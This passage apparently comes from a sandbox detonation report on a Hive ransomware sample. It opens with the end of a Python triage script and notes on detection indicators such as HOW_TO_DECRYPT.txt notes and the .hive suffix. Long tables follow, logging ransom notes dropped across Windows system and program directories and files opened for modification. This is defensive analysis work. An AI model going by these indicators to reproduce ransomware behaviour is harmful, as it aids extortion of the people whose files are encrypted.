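    for proc, s in triage(SAMPLE_ROWS).items():
        print(proc, verdict(s), sorted(s.hive_tokens))
```

Run against the rows above, the Hive process earns the note-spray, rename and startup tags while spoolsv.exe is tagged only for the DLL under prtprocs, which is the distinction the raw "Print Processors" signature does not make. The extension token is collected rather than hard-coded because it varies per victim; the fixed `HOW_TO_DECRYPT.txt` name and the `.hive` suffix are the stable parts of the pattern in this detonation.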
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\Speech\SpeechUX\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\SecureBoot\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\vhdmp.inf_amd64_aa94d04ecf56de1f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAll\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\InstallShield\setupdir\0804\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\uk-UA\Licenses\Volume\Professional\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmusrg.inf_amd64_bb7c44c7bb3664d0\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\Volume\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\wbem\Repository\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Printing_Admin_Scripts\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\iai2c.inf_amd64_a77c815b2999404d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmcrtix.inf_amd64_e3ded2b26d662526\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\IME\IMEKR\APPLETS\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\Microsoft\Windows\PLA\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\drivers\W32X86\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\it-IT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_unknown.inf_amd64_9f92c189b415c003\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hal.inf_amd64_fd0ae947345ac7bf\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\rdpbus.inf_amd64_05ebd3b4422f62ba\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\Common\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\Microsoft\OneCore\DirectX\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\migwiz\replacementmanifests\WindowsSearchEngine\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\sppui\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\Common\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spp\tokens\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_fscopyprotection.inf_amd64_9c108d8ac558a80d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmfj2.inf_amd64_167948d0c94abc27\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\stornvme.inf_amd64_1218fad01506b7af\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\tsusbhub.inf_amd64_bd91a147ab4ebf1c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Com\dmp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Licenses\neutral\OEM\Professional\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Professional\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_extension.inf_amd64_7891c7d003f5e96b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\fidohid.inf_amd64_c446be9403cdcdb1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\SpeechUX\uk-UA\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WCN\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Kds\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\tw-c28-c2c-2f6b.tmp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\ko-KR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Boot\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Configuration\Registration\MSFT_FileDirectoryConfiguration\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\bthleenum.inf_amd64_11f9ff6c12dbf9b5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\InputMethod\CHT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\tw-d60-d90-a182.tmp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\rspndr.inf_amd64_4e80c2bb5314f071\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\Engines\SR\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{6f126544-600f-4756-8792-b71c4e30f413}\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\pl-PL\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_fsencryption.inf_amd64_b4b4845819a23338\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAny\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\uk-UA\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.P7EsMTWem2f4DapaPblE9JLMqb0GT-MsqSXfDBplsgc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.scale-400.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ONBttnPPT.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\202.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-60_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
